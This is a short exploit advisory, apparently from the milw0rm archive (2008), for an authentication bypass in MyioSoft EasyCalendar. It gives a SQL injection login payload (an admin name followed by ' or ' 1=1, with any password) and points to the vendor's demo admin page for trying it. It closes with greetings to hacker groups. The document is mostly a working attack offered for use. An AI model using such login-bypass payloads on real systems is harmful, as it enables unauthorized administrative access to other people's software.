43 lines
No EOL
956 B
Text
43 lines
No EOL
956 B
Text
[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
|
|
[~]
|
|
[~] ----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu
|
|
[~]
|
|
[~] Date: 07.11.2008
|
|
[~]
|
|
[~] Home: www.z0rlu.blogspot.com
|
|
[~]
|
|
[~] contact: trt-turk@hotmail.com
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] -----------------------------------------------------------
|
|
|
|
Exploit:
|
|
|
|
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
|
|
|
|
password: ZoRLu
|
|
|
|
note: generally admin name: admin
|
|
|
|
|
|
admin login for demo:
|
|
|
|
http://myiosoft.com/products/EasyCalendar/demo/
|
|
|
|
|
|
example for demo:
|
|
|
|
admin: demo1 ' or ' 1=1
|
|
|
|
passwd: ZoRLu
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & all Muslim HaCkeRs
|
|
[~]
|
|
[~] yildirimordulari.org & darkc0de.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-11-07] |